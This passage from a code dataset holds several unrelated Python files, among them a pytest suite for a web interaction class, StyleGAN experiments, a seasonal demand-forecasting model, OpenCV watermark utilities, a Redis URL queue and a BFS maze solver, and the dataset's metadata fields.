subclasses\n expected_api_point = \"/interact/{interaction_id}\"\n\n return {\"in1\":input1_dict, \"in2\":input2_dict, \n \"out\":output_dict, \"callback\": callback, \n \"api_point\": expected_api_point, \"parameters\":para_dict}\n \n\n @pytest.fixture\n def fixture_normal_ini(self, mocker, fixture_normal_parameters): \n # TEST initialization of Interact \n\n input1, input2, output, callback, \\\n api_point_format, para_dict = fixture_normal_parameters.values() \n\n \n mock_input1 = mocker.patch(\"zig.interact.InteractIn\", \n spec=True, \n identity=input1[\"id\"], \n attribute=input1[\"attribute\"], \n value=input1[\"value\"], \n dom_type=input1[\"dom_type\"],\n key=None)\n\n mock_input2 = mocker.Mock(spec=InteractIn, \n identity=input2[\"id\"],\n attribute=input2[\"attribute\"], \n value=input2[\"value\"], \n dom_type=input2[\"dom_type\"],\n key=None)\n\n mock_output = mocker.patch(\"zig.interact.InteractOut\", \n spec=True, \n identity=output[\"id\"], \n attribute=output[\"attribute\"], \n value=output[\"value\"], \n dom_type=output[\"dom_type\"])\n\n interaction = Interact( [mock_input1, mock_input2],\n mock_output, \n callback)\n\n return interaction\n\n \n # blackbox: doesn't need to know how inputs are stored\n def test_input_args(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST that all input elements and their specifications are stored,\n # and can be retrieved. CHECK: inputs_args \n interaction = fixture_normal_ini \n expected_arguments = [ fixture_normal_parameters[\"in1\"][\"value\"], fixture_normal_parameters[\"in2\"][\"value\"] ]\n\n assert interaction.inputs_args == expected_arguments\n\n\n def test_input_keyword_args(self, fixture_normal_ini):\n # TEST that all input elements can be stored along with their keywords\n # and can be retrieved as such. CHECK: inputs_kwargs \n pass\n\n\n def test_output_elements(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST that all output elements and their specs are stored,\n # and can be retrieved. CHECK: output_dict \n\n interaction = fixture_normal_ini\n output = fixture_normal_parameters[\"out\"]\n expected_output_data = None\n\n # NOTE: might implement diff. format for diff. 
subclass\n expected_output_elements = {output[\"id\"]: { \n \"attribute\": output[\"attribute\"],\n \"dom_type\": output[\"dom_type\"],\n \"data\": expected_output_data \n } } \n # it produces an Ordered Dict\n assert dict(interaction.output_dict) == expected_output_elements \n\n\n \n def test_generate_api_point(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST that it will auto-generate a url for api\n # CHECK: api_point \n\n api_point_format = fixture_normal_parameters[\"api_point\"]\n interaction = fixture_normal_ini\n expected_api_point = api_point_format.format(interaction_id=interaction.id)\n\n assert interaction.api_point == expected_api_point \n\n\n # NOTE: IMPT it combines a few of the previous tests\n def test_rendering(self, fixture_normal_ini, fixture_normal_parameters):\n # given in and out, able to render into dict object (json-like)\n interaction = fixture_normal_ini\n inputs = [fixture_normal_parameters[\"in1\"], fixture_normal_parameters[\"in2\"]]\n output = [fixture_normal_parameters[\"out\"]]\n\n input_dict = {i:{\"id\":v[\"id\"] , \"dom_type\":v[\"dom_type\"], \"attribute\":v[\"attribute\"]} \n for i,v in enumerate(inputs) }\n\n output_dict = {i:{\"id\":v[\"id\"] , \"dom_type\":v[\"dom_type\"], \"attribute\":v[\"attribute\"]} \n for i,v in enumerate(output) }\n\n test_generate_api_point = fixture_normal_parameters[\"api_point\"] \\\n .format(interaction_id=interaction.id)\n\n\n expected_json = {\"input\": input_dict, \"output\": output_dict, \"api_point\": test_generate_api_point}\n \n \n #NOTE: Interact Object will trigger render on each In and Out Object\n\n assert interaction.render() == expected_json \n\n\n def test_update_single_input(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST update of single input value from input 2\n \n interaction = fixture_normal_ini \n\n # input 2: HtmlElement of type Div, content, id='123'\n new_value = \"this is a test value\" \n new_input2 = [\"123\", \"content\", new_value, \"div\"]\n\n\n input2_dict = {i:x for i, x in zip(fixture_normal_parameters[\"parameters\"], new_input2)}\n \n expected_input_values = [fixture_normal_parameters[\"in1\"][\"value\"], new_input2[2]]\n\n #TODO: this is incomplete. 
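One possible shape for that (a hypothetical helper, not part of the original API) is sketched here:\n # def push_updates(interaction, updates):\n # # updates: iterable of (identity, attribute, value) triples\n # for identity, attribute, value in updates:\n # interaction._update_single_input(identity, attribute, value)\n # return interaction.inputs_args\n # 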
Need a better way to push update\n assert interaction._update_single_input(*new_input2[:3]) is True\n assert interaction.inputs_args == expected_input_values\n\n \n def test_process_inputs_generate_output(self, fixture_normal_ini, fixture_normal_parameters):\n # NOTE: NEED TO change test\n # TEST that it is able to generate new output value from callback with input values\n interaction = fixture_normal_ini\n\n expected_output = fixture_normal_parameters[\"in1\"][\"value\"] * fixture_normal_parameters[\"in2\"][\"value\"]\n result = interaction._process_inputs()\n\n assert result == expected_output\n\n\n def test_update_output_values(self):\n # TEST output is generated and updated: \n pass\n\n\n\n def test_update_via_put(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST update of put response\n interaction = fixture_normal_ini \n\n # given dictionary response from external source for input 1\n updated_value = \"Hello world!\" \n json_response = { 0:{\"type\":\"div\" ,\"id\":\"123\" , \"data\":updated_value, \"attribute\":\"content\"}}\n expected_args = [fixture_normal_parameters[\"in1\"][\"value\"], updated_value]\n\n # api-point will trigger this function\n interaction.put_response(json_response)\n \n assert interaction.__compile_args() == expected_args\n\n\n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n","sub_path":"tests/unit/test_interact.py","file_name":"test_interact.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239253798","text":"import torch\nimport numpy as np\nfrom module.net import Generator, Mapping, Discriminator\nfrom torchvision.utils import save_image\nimport torchvision\nfrom torch.nn import functional as F\n\n#------------------随机数设置--------------\ndef set_seed(seed):\n np.random.seed(seed)\n #random.seed(seed)\n torch.manual_seed(seed) # cpu\n torch.cuda.manual_seed_all(seed) # gpu\n torch.backends.cudnn.deterministic = True\n\n#-------测试G和pgE在PG下的分辨率情况------------\n# G = Generator(startf=16, maxf=512, layer_count=9, latent_size=512, channels=3)\n# G.load_state_dict(torch.load('./pre-model/Gs_dict.pth'))\n# Gm = Mapping(num_layers=18, mapping_layers=8, latent_size=512, dlatent_size=512, mapping_fmaps=512)\n# Gm.load_state_dict(torch.load('./pre-model/Gm_dict.pth')) \n\n# i=9\n# lod = 8\n# set_seed(i)\n# latents = torch.randn(5, 512)\n\n# with torch.no_grad():\n# \tlatents = Gm(latents) \n# \timg = G.forward(latents,lod=lod) # lod = 8 -> 1024\n# save_image((img+1)/2, 'lod%d.png'%lod)\n\n\n# E = BE.BE()\n# print(img.shape)\n# c, w = E(img,block_num=lod+1)\n# print(c.shape)\n# print(w.shape)\n\n#-----------测试不同结构BE的pre-model加载情况\n\n#import module.BE as BE\n# import module.BE_v2 as BE\n# E = BE.BE()\n\n# # #E.load_state_dict(torch.load('/Users/apple/Desktop/myStyle/StyleGAN-v1/E_model_ep30000.pth',map_location=torch.device('cpu')),strict=False)\n\n# # #先分析两个模型的keys差异\n# pretrained_dict = torch.load('/Users/apple/Desktop/myStyle/StyleGAN-v1/pre-model/v6_2_E_model_ep10000.pth',map_location=torch.device('cpu'))\n# model_dict = E.state_dict()\n\n# #查找包含的差异keys的字符\n# for k,v in model_dict.items():\n# \tif '2' in k and 'conv' not in k:\n# \t\tprint(k)\n# \t\tpretrained_dict.pop(k)\n\n# for k,v in model_dict.items():\n# \tif ('2' in k and 'conv' not in k) or ('inver_mod1' in k):\n# \t\tpretrained_dict.pop(k)\n\n# model_dict.update(pretrained_dict)\n# E.load_state_dict(model_dict,strict=False) # strict=False\n\n# del pretrained_dict\n# del model_dict\n\n# # 更新\n# 
model_dict.update(pretrained_dict)\n# E.load_state_dict(model_dict,strict=False) # strict=False\n\n# with torch.no_grad():\n# \tlatents = Gm(latents) \n# \timg1 = G.forward(latents,lod=lod)\n# \tc, w = E(img1,block_num=lod+1)\n# \timg2 = G.forward(w,lod=lod)\n\n# img = torch.cat((img1,img2))\n# save_image((img+1)/2, 'ED_lod%d_i%d.png'%(lod,i),nrow=5)\n\n\n#---------------多种插值的上下采样方式--------\n# from torch.nn import functional as F\n\n# #img2_1 = F.interpolate(img,[256,256],mode='bilinear')\n# img2_2 = F.avg_pool2d(img,2,2)\n# #img2_3 = F.interpolate(img,[256,256])\n\n# with torch.no_grad():\n# \tlatents = Gm(latents) \n# \timg1 = G.forward(latents,lod=lod)\n\n# save_image((img+1)/2, 'ED_lod%d_i%d.png'%(lod,i),nrow=5)\n\n#------------------裁剪区域----------------\nloader = torchvision.transforms.Compose([torchvision.transforms.ToTensor()])\n\nfrom PIL import Image\ndef image_loader(image_name):\n\timage = Image.open(image_name).convert('RGB')\n\t#image = image.resize((1024,1024))\n\timage = loader(image).unsqueeze(0)\n\treturn image.to(torch.float)\n\nimg1=image_loader('./sample.png')\nimg1 = img1*2-1\nprint(img1.shape)\nimg1 = F.avg_pool2d(img1,2,2)\nprint(img1.shape)\nimg1 = F.avg_pool2d(img1,2,2)\nprint(img1.shape)\n\n# img2 = img[:,:,:,128:-128]\n# print(img2.shape)\n# img3 = F.avg_pool2d(img2,2,2)\n# print(img3.shape)\nsave_image((img1+1)/2, 'down256.png',nrow=1)\n\n\n\n\n","sub_path":"test/test_v3.py","file_name":"test_v3.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77589734","text":"def UniqueElements(a: list):\n res = []\n for i in range(len(a)):\n if a[i] not in a[i+1:] and a[i] not in a[:i]:\n res.append(a[i])\n return res\n\n\na = list(map(int, input().split()))\nprint(*UniqueElements(a))\n\n","sub_path":"uniqEl.py","file_name":"uniqEl.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"596533442","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nclass multiseasonal_temp(object):\n \"\"\"multiseasonal_temp\n\n Extends multiseasonal model to include temperature inputs.\n\n Models temperature effects via: \n D~ A_n[T_n-T]_{+} + A_p[T-T_p]_{+}, where\n []_{+} is only non-zero if its argument is non-zero.\n \"\"\"\n def __init__(self, l=0, b=0, s=np.zeros((2,24)), \\\n alpha=0.1, beta=0.1, gamma=np.zeros((2,2)), \\\n A0=2000, Ap=10, An=10,Tp=200, Tn=100):\n self.l=l\n self.b=b\n self.s=s\n self.alpha=alpha\n self.beta=beta\n #easiest to initialize via a single matrix.\n self.g00 = gamma[0,0]\n self.g01 = gamma[0,1]\n self.g10 = gamma[1,0]\n self.g11 = gamma[1,1]\n #temperature model parameters.\n self.Ap = Ap\n self.An = An\n self.Tp = Tp\n self.Tn = Tn\n self.smooth_names=['alpha','beta','g00','g01','g10','g11']\n self.temp_names=['An','Ap','Tn','Tp']\n self.names=self.smooth_names+self.temp_names\n self.save_opt_param()\n\n def gamma(self):\n \"\"\"gamma(self)\n Compute matrix of smoothing coefficients from instance\n variables. Allows sim to update each one algorthimically\n for numerical derivatives.\n \"\"\"\n gamma=np.array([[self.g00,self.g01],[self.g10,self.g11]])\n return gamma\n\n def Tmodel(self,T):\n \"\"\"Tmodel\n Computes temperature component of demand.\n Fits two rectified linear models (one for high temp),\n one for low.\n DT ~ Ap [T-Tp]_{+} + An[Tn-T]_{+}\n \"\"\"\n m1 = T>self.Tp\n m2 = T=5\n #select out weekends, and regular days. 
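Row 0 of self.s holds the weekday pattern and row 1 the weekend pattern, matching the self.s[m1.astype(int),m2] lookup in predict_dayahead.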
\n y_end = ysub[s2]\n y_week= ysub[~s2]\n n1 = int(len(y_week)/24)\n n2 = int(len(y_end)/24)\n self.s = np.zeros((2,24))\n for n in range(n1):\n self.s[0,:] = self.s[0,:]+y_week[n*24:(n+1)*24]/n1\n for n in range(n2):\n self.s[1,:] = self.s[1,:]+y_end[n*24:(n+1)*24]/n2\n\n def predict_dayahead(self,y,T):\n \"\"\"predict_correct_dayahead\n Predict day-ahead demand given previous parameters.\n \"\"\"\n t0=y.index\n m1 = t0.dayofweek>=5\n m1_n = t0.dayofweek<5 \n m2 = t0.hour\n #find temp trend.\n Ttrend= self.Tmodel(T[t0])\n trend=self.l+self.b*np.arange(len(y))\n season=self.s[m1.astype(int),m2]\n #make prediction based on current estimates\n ypred =Ttrend+ trend+season\n return pd.Series(ypred,index=y.index)\n\n def correct_dayahead(self,y,ypred):\n \"\"\"correct_dayahead(y,ypred)\n Updates level, bias and seasonal patterns given \n \"\"\"\n t0=y.index\n m1 = t0.dayofweek>=5\n m1_n = t0.dayofweek<5 \n eps = y-ypred\n eps_l = np.mean(eps)\n self.l += self.alpha*eps_l\n eps=eps-eps_l\n eps_b = (eps[-1]-eps[0])/len(eps)\n self.b += self.beta*eps_b\n eps=eps-eps_b*np.arange(len(eps))\n ds = np.dot(self.gamma(),np.array([m1_n,m1]))*[eps,eps]\n self.s = self.s + ds\n\n def STL_dayahead(self,y,T,ninit=4*24*7):\n \"\"\"STL_dayahead\n Predict day-ahead demand given previous parameters.\n Then update parameters given true demand.\n \"\"\"\n self.fit_init_params(y,T,ninit=ninit)\n t0=y.index[0]\n m1 = t0.dayofweek>=5\n m2 = t0.hour\n ypred = np.zeros(len(y))\n ti = y[:ninit].index\n msk=ti.dayofweek>=5\n Ttrend= self.Tmodel(T[ti])\n trend = self.l+self.b*np.arange(ninit)\n season= self.s[msk.astype(int),ti.hour.values]\n\n ypred[:ninit] =Ttrend+trend+season\n for i in range(int(ninit/24),int(len(y)/24)):\n tslice = slice(i*24,(i+1)*24)\n ypred[tslice] = self.predict_dayahead(y[tslice],T[tslice])\n self.correct_dayahead(y[tslice],ypred[tslice])\n \n # if i%(24*7) ==0:\n # print(\"l: {} b: {}\\n\".format(str(l),str(b)))\n # print(s,\"\\n\")\n ypred=pd.Series(ypred,index=y.index) \n return ypred\n\n def optimize_param(self,y,T,ninit=4*24*7,rtol=0.01,\\\n eta=0.001,lr=0.05,nmax=1000):\n \"\"\"optimize_param\n Use gradient descent to find optimum parameters for learning \n rates alpha,beta,gamma. Wait till all of their values are \n settled to a relative tolerance.\n Cost is root Mean Square Error over whole time series.\n Currently tries to predict day ahead. 
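Each parameter p is nudged by a relative step eta and the gradient of the cost J is estimated with the one-sided finite difference dJ/dp ~ (J(p*(1+eta)) - J(p))/(eta*p).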
\n \"\"\"\n self.fit_init_params(y,T)\n #Super clunky way of specifying names.\n #Why did I think this was superior?\n pred0 = self.STL_dayahead(y,T,ninit=ninit)\n J = self.rmse(y[ninit:],pred0[ninit:])\n Ni=0\n J_opt=J\n #loop over iterations\n for i in range(nmax):\n dJ_max=0\n lr = lr*0.99\n #for each name, tweak the model's variables.\n oldJ=J \n for n in self.names:\n #estimate finite-difference gradient.\n p0=self.__getattribute__(n) \n self.__setattr__(n,p0*(1+eta))\n pred=self.STL_dayahead(y,T,ninit=ninit)\n J2=self.rmse(y[ninit:],pred[ninit:])\n dJ = (J2-J)/(eta*p0)\n #dJ = (J2-J)/J \n #actually update \n #p = p0-lr*dJ/(eta)\n #use mod to truncate gradient.\n if n in self.smooth_names:\n p = p0-lr*np.fmod(dJ,1)\n else:\n p = p0-lr*dJ\n #restrict smoothing parameters to be within [0,1].\n p=self.check_limits(n,p,p0)\n self.__setattr__(n,p)\n J=J2\n dJ_max=max(dJ,dJ_max)\n Ni+=1 \n if (dJ_max<rtol):\n print(\"Converged after {} iter\\n\".format(Ni))\n return pred\n if (J<J_opt):\n J_opt=J\n self.save_opt_param()\n if (J>1.2*J_opt):\n print('Resetting param to best')\n self.restore_opt_param()\n lr=0.8*lr\n eta=0.8*lr\n \n print(\"Failed to hit tolerance after {} iter\\n\".format(nmax))\n print(\"Cost:\",J,J2)\n return pred \n\n def save_opt_param(self):\n \"\"\"save_opt_param\n\n Saves optimal parameters in variable\n \"\"\"\n pv=[]\n for n in self.names:\n pv.append(self.__getattribute__(n))\n pdict=dict(zip(self.names,pv))\n self.opt_param=pdict\n\n def restore_opt_param(self):\n \"\"\"restore_opt_param\n\n Restore optimal parameters in variable\n \"\"\"\n for n in self.names:\n p=self.opt_param[n]\n self.__setattr__(n,p)\n \n \n def check_limits(self,n,p,p0):\n \"\"\"check_limits\n Ensures smoothing and temperature parameters\n fall within reasonable ranges, e.g. [0,1] for smoothing.\n \"\"\"\n if (n in ['alpha','beta','g00','g01','g10','g11']):\n if (p>1):\n print('param {} >1(!): {}'.format(n,p))\n p=min(p0+0.5*(1-p0),0.99)\n elif(p<0): \n print('param {} <0(!): {}'.format(n,p))\n p=0.25*p0\n #restrict positive/negative temperature thresholds. 
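Thresholds here appear to be in tenths of a degree C (100 = 10C, 200 = 20C), judging by the comments below.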
\n if (n=='Tp' and p<100):\n #nobody wants AC below 10C.\n p=100\n if (n=='Tn' and p>200):\n #nobody wants heating above 20\n p=200\n if (n in ['An','Ap'] and p<0):\n p=0.5*p0\n \n return p \n\n def rmse(self,x,y):\n \"\"\"compute mean_square_error\"\"\"\n z = np.sum( (x-y)*(x-y))/len(x)\n z = np.sqrt(z)\n return z\n \n def plot_pred(self,series_list,label_list):\n \"\"\"make plot to compare fitted parameters\"\"\"\n for s,l in zip(series_list,label_list):\n plt.plot(s,label=l) \n plt.legend()\n plt.show()\n","sub_path":"EBA_seasonal/multiseasonal_temp.py","file_name":"multiseasonal_temp.py","file_ext":"py","file_size_in_byte":9820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"205542344","text":"import csv\nfrom typing import TextIO\ndataset = dict()\na = []\n'''\n\nwith open('acoes.csv') as f:\n reader = csv.reader(f, skipinitialspace=True)\n #header = next(reader)\n #a = [dict(zip(header, map(int, row))) for row in reader]\n a = list(reader)\n a.\nprint (a[0][$])\n\nwith open('regramod.csv','r') as csv_file:\n data=csv.DictReader(csv_file)\n for line in data :\n a.append(line)\nprint(a)\n\nprint(a[0])\n\nwith open(\"regramod.csv\") as myfile:\n for line in myfile:\n values = \"\".join(line.split()).split(',')\n a.append({values[0]:values[1]})\n firstline = True\n for line in myfile:\n if firstline:\n mykeys = \"\".join(line.split()).split(',')\n firstline = False\n else:\n values = \"\".join(line.split()).split(',')\n a.append({mykeys[n]:values[n] for n in range(0,len(mykeys))})\n\n\n\nb = []\nwith open(\"regramod.csv\") as myfile:\n firstline = True\n for line in myfile:\n if firstline:\n mykeys = \"\".join(line.split()).split(',')\n firstline = False\n else:\n values = \"\".join(line.split()).split(',')\n b.append({mykeys[n]:values[n] for n in range(0,len(mykeys))})\nprint(b[]['indice'])\n'''\na = {}\n\nwith open(\"regra_nao_terminal.csv\") as myfile:\n for line in myfile:\n values = \"\".join(line.split()).split(',')\n a.update({values[0]:values[1]})\nprint (a['3'])","sub_path":"ler_A_regra.py","file_name":"ler_A_regra.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278733276","text":"from patternpieces import PatternPieces\nfrom piece import Piece\nfrom piecesbank import PiecesBank\nfrom ui import UI\nfrom board import Board\nfrom arbiter import Arbiter\nfrom ai import Ai\nimport json\nimport random\n\ndef main():\n\n pb = PiecesBank()\n app = UI()\n ### DO NOT FUCKING REMOVE THIS. I DARE YOU. ###\n app.preloadPieces(pb.pieceslist)\n ai = Ai()\n arbiter = Arbiter()\n board = Board()\n\n app.setBatchMethod(lambda loop, fitness, mutation: ai.main_function(pb, app, arbiter, board, loop, fitness, mutation))\n # app.drawTable(board)\n app.drawTable(generatedSolvedPuzzle(pb))\n ### DO NOT FUCKING REMOVE THIS EITHER. 
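(app.mainloop() hands control to the GUI event loop; without this call the window would close as soon as the script ends) 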
###\n app.mainloop()\n\n\ndef generatedSolvedPuzzle(pb):\n ret = Board()\n for y in range(16):\n for x in range(16):\n ret[x, y] = pb.pieceslist[x + y * 16]\n if (y != 0):\n if (y % 2 == 0):\n ret[x, y].upEdge = PatternPieces.YELLOWFLOWERINBLUE\n else:\n ret[x, y].upEdge = PatternPieces.BLUESTARINYELLOW\n else:\n ret[x, y].upEdge = PatternPieces.EDGE\n\n if (x != 15):\n if (x % 2 == 0):\n ret[x, y].rightEdge = PatternPieces.BLUEGEARINPINK\n else:\n ret[x, y].rightEdge = PatternPieces.YELLOWSTARINPURPLE\n else:\n ret[x, y].rightEdge = PatternPieces.EDGE\n\n if (y != 15):\n if (y % 2 == 1):\n ret[x, y].downEdge = PatternPieces.YELLOWFLOWERINBLUE\n else:\n ret[x, y].downEdge = PatternPieces.BLUESTARINYELLOW\n else:\n ret[x, y].downEdge = PatternPieces.EDGE\n\n if (x != 0):\n if (x % 2 == 1):\n ret[x, y].leftEdge = PatternPieces.BLUEGEARINPINK\n else:\n ret[x, y].leftEdge = PatternPieces.YELLOWSTARINPURPLE\n else:\n ret[x, y].leftEdge = PatternPieces.EDGE\n return ret\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"488623698","text":"import redis\nfrom multiprocessing import Process\nimport time\nimport random\n\nclass LianjiaSpider(object):\n def __init__(self):\n self.r = redis.Redis(\n host='127.0.0.1',port=6379,db=0\n )\n\n # Producer - push 100 page URLs onto a redis list\n def product(self):\n for i in range(1,101):\n url = 'http://lianjia.com/pg{}'.format(i)\n self.r.lpush('lianjia:urls',url)\n time.sleep(random.randint(1,2))\n\n # Consumer - pop URLs from the list and scrape them\n def consumer(self):\n while True:\n result = self.r.brpop('lianjia:urls',3)\n if result:\n print('Scraping:',result[1].decode())\n else:\n break\n\n\n # Entry point\n def run(self):\n p1 = Process(target=self.product)\n p2 = Process(target=self.consumer)\n p1.start()\n p2.start()\n p1.join()\n p2.join()\n\nif __name__ == '__main__':\n spider = LianjiaSpider()\n spider.run()\n","sub_path":"redis/day01/03_list_queue.py","file_name":"03_list_queue.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600357250","text":"import cv2\nimport numpy as np\nfrom watermark_img_1 import create_mask, remove_background, create_invisible_image\n\n\ndef create_txt_image(text, color_text, save_mask, font_size):\n font_scale = 1\n thickness = 2\n font_text = cv2.FONT_HERSHEY_SIMPLEX\n rows_txt, cols_txt = 0, 0\n if len(text) > 0:\n rows_txt = cv2.getTextSize(text, font_text, 1, 2)[0][1] + 5\n cols_txt = cv2.getTextSize(text, font_text, 1, 2)[0][0] + 5\n if font_size == 0:\n rows_txt = rows_txt + 3*len(text)\n cols_txt = cols_txt + 8*len(text)\n elif font_size == 1 and (\"q\" in list(text) or \"y\" in list(text) or \"g\" in list(text) or \"j\" in list(text)):\n rows_txt = rows_txt + 10\n\n mask_img = np.zeros((rows_txt, cols_txt, 3), dtype='uint8')\n textsize = cv2.getTextSize(text, font_text, 1, 2)[0]\n pozX = (mask_img.shape[1] - textsize[0]) // 2\n pozY = (mask_img.shape[0] + textsize[1]) // 2\n cv2.putText(mask_img, text, (pozX, pozY), font_text, font_scale, color_text, thickness, cv2.LINE_AA)\n cv2.imwrite(\"mask.png\", mask_img)\n\n if save_mask == 1:\n cv2.putText(mask_img, text, (pozX, pozY), font_text, font_scale, (255, 255, 255), thickness, cv2.LINE_AA)\n cv2.imwrite(\"mask_text.png\", mask_img)\n else:\n mask_img.fill(255)\n cv2.imwrite(\"mask_text.png\", 
mask_img)\n\n\n\ndef add_logo_text(path_image, path_logo, alpha, x_poz, y_poz, who_save):\n if who_save:\n img = cv2.imread(path_image)\n else:\n img = path_image\n logo = cv2.imread(path_logo)\n mask_overlay = np.zeros((img.shape[0], img.shape[1], 3), dtype=\"uint8\")\n mask_overlay[x_poz:x_poz + logo.shape[0], y_poz:y_poz + logo.shape[1]] = logo\n logo_image = img.copy()\n logo_image = cv2.addWeighted(mask_overlay, alpha, logo_image, 1, 0, logo_image)\n if who_save:\n cv2.imshow('image with logo', logo_image)\n cv2.waitKey(0)\n cv2.imwrite(\"logo_img.png\", logo_image)\n else:\n return logo_image\n\n\ndef compute_mask_text(path_image, x_poz, y_poz, how_arg):\n if how_arg:\n img = cv2.imread(path_image)\n else:\n img = path_image\n mask_img = cv2.imread('mask_text.png')\n y1, y2 = y_poz, y_poz + mask_img.shape[1]\n x1, x2 = x_poz, x_poz + mask_img.shape[0]\n # print(\"mash shape\", mask_img.shape[:2])\n # print(\"x1-y1\", x1, y1,\"x2-y2\", x2, y2)\n total_list = []\n rows, cols = mask_img.shape[:2]\n for i in range(rows):\n for j in range(cols):\n total_list.append(list(mask_img[i, j]))\n\n mask = np.zeros(img.shape[:])\n elem = 0\n # rows, cols = mask.shape[:2]\n # print(len(total_list))\n for i in range(x1, x2-1):\n for j in range(y1-1, y2-1):\n # print(i, j, total_list[elem], elem)\n mask[i, j] = total_list[elem]\n elem = elem + 1\n # cv2.imshow(\"maskaaaa\", mask)\n # cv2.waitKey(0)\n cv2.imwrite('rm_mask.png', mask)\n\n\n\ndef remove_logo_text(path_image, arg):\n if arg:\n img = cv2.imread(path_image)\n else:\n img = path_image\n mask = cv2.imread('rm_mask.png', 0)\n image_result = cv2.inpaint(img, mask, 3, cv2.INPAINT_TELEA)\n if arg:\n cv2.imshow(\"result\", image_result)\n cv2.waitKey(0)\n cv2.imwrite(\"rl_image.png\", image_result)\n else:\n return image_result\n\ndef add_watermark_text(path_image, text, color, save, alpha, poz_x, poz_y):\n create_txt_image(text, color, save, 1)\n create_mask(\"mask.png\")\n remove_background(\"mask.png\")\n create_invisible_image()\n add_logo_text(path_image, 'invisible_bkd.png', alpha, poz_x, poz_y, 1)\n\ndef remove_watermark_text(path_image, poz_x, poz_y):\n compute_mask_text(path_image, poz_x, poz_y, 1)\n remove_logo_text(path_image, 1)\n\n# create_txt_image('ana are mere', (255,0,255), 0, 1)\n#\n# create_mask(\"mask.png\")\n# remove_background(\"mask.png\")\n# create_invisible_image()\n# add_logo_text(\"d.jpg\", 'invisible_bkd.png', 0.5, 50, 50, 1)\n\n\n# print(\"lalalallaaaa\")\n\n\n# add_watermark_text(\"d.jpg\", \"ana are mere\",(255,0,255), 0,0.5, 50, 50)\n# compute_mask_text(\"logo_img.png\", 5, 50, 1)\n# remove_logo_text('logo_img.png', 1)\n\n","sub_path":"watermark_text_1.py","file_name":"watermark_text_1.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"654041959","text":"## Hill climbing version of random monkey algorithm.\n\nimport random\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz \"\nshakespeare = \"methinks it is like a weasel\"\n\ndef random_char_generator():\n return random.choice(alphabet)\n\ndef compare_chars(char1, char2):\n return char1 == char2\n\ndef generate_and_score():\n best_sentence_so_far = \"\"\n number_of_tries = 0\n current_index = 0 \n while current_index < len(shakespeare):\n random_char = random_char_generator()\n if compare_chars(random_char, shakespeare[current_index]):\n best_sentence_so_far += random_char\n current_index += 1\n print(best_sentence_so_far)\n number_of_tries += 1\n print(\"It only took \" + 
str(number_of_tries) + \" tries!\")\n\ngenerate_and_score()\n","sub_path":"1_introduction/infinite_monkey_theorem_hill_climbing.py","file_name":"infinite_monkey_theorem_hill_climbing.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"485367993","text":"\"\"\"\nMaze Escape\n\nYou are trapped in a rectangular N * M maze.\nThe maze contains several monsters that must be avoided in order to escape.\nYour current position is (1, 1) and the exit is at (N, M); you can move one square at a time.\nSquares holding a monster are marked 0, monster-free squares are marked 1.\nThe maze is always given in a form that can be escaped. Find the minimum number of squares Dongbin must pass through to escape.\nWhen counting squares, include both the starting square and the final square.\n\nInput\n- The first line contains two integers N, M (4 <= N, M <= 200).\nThe next N lines each describe the maze with M integers (0 or 1).\nThe digits are given with no spaces between them. The starting and final squares are always 1.\n\nOutput\n- Print the minimum number of squares moved on the first line.\n\"\"\"\n\nfrom collections import deque\n\nn,m=map(int,input().split())\ngraph=[]\nfor i in range(n):\n\tgraph.append(list(map(int,input())))\n\ndx=[0,0,1,-1]\ndy=[1,-1,0,0]\n\ndef bfs(start_x,start_y):\n\tqueue=deque()\n\tqueue.append((start_x,start_y))\n\n\twhile queue:\n\t\tx,y=queue.popleft()\n\n\t\tfor i in range(4):\n\t\t\tnext_x=x+dx[i]\n\t\t\tnext_y=y+dy[i]\n\n\t\t\tif next_x<0 or next_x>n-1 or next_y<0 or next_y>m-1:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif graph[next_x][next_y]==0:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif graph[next_x][next_y]==1:\n\t\t\t\tqueue.append((next_x,next_y))\n\t\t\t\tgraph[next_x][next_y]=graph[x][y]+1\n\t\n\treturn graph[n-1][m-1]\n\nprint(bfs(0,0))","sub_path":"DFS,BFS/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610489207","text":"# -*- coding: utf-8 -*-\n#\n# @author Vladimir S. 
